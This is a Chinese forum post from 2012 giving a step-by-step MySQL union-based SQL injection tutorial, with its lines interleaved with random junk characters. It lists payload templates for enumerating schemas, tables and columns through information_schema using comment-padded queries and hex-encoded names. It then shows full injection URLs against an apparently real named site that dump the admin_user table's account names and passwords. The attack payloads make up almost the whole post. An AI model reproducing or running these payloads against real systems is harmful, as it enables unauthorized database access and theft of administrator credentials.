查库- H1 C3 ~0 O! W$ }0 }% ?8 I8 o5 k5 C2 p
! |% a2 D& k, q' M9 o5 M8 f! Jid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*) b/ F, n8 Z" P' H
0 {& ~9 i0 ?2 S$ J- W查表
$ c0 g, y# ]8 S8 \# `
4 N. ]& ^5 N9 f% lid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
! ]9 s" a$ y+ n2 c; N9 L3 a2 A* d; u$ j% K0 h5 n! [
查段
1 B+ j, l8 M% |" W3 v ^8 }$ e9 e5 Q& R7 d8 K4 Y. _
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1/ Z' k4 r$ x, J( h W; O
5 ~" |2 D) Q+ ?$ w. f6 ~& g5 L
% s; N) M/ S! G2 S! Cmysql5高级注入方法暴表
_* F3 `4 r( e2 H3 t2 }( w% }1 i' k- h$ `: H+ I4 K7 k7 b" Q/ p" a
例子如下:
0 l) W& }4 S" |, G* i3 Y$ E# j5 t. I0 g+ L
1.爆表: L: v9 a4 n4 P# @) @
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)' I& u0 F( }- ^. |
这样爆到第4个时出现了admin_user表。) q) F* { l \7 S$ |
6 J% F) p: Q$ ]; R
2.暴字段
* j9 ^1 {8 o2 khttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*9 g6 C' [$ ~- P' I
2 a3 J6 S1 C* n! Z
3 y9 n& n9 F, Q8 Z- s9 u3.爆密码
1 m$ G& {$ k, a% Nhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
) L4 x- M+ i% X. x# j f: y8 u6 p' k5 C
( P1 O3 }' ]* f |
发表于 2012-9-13 16:29:37
收藏
支持
反对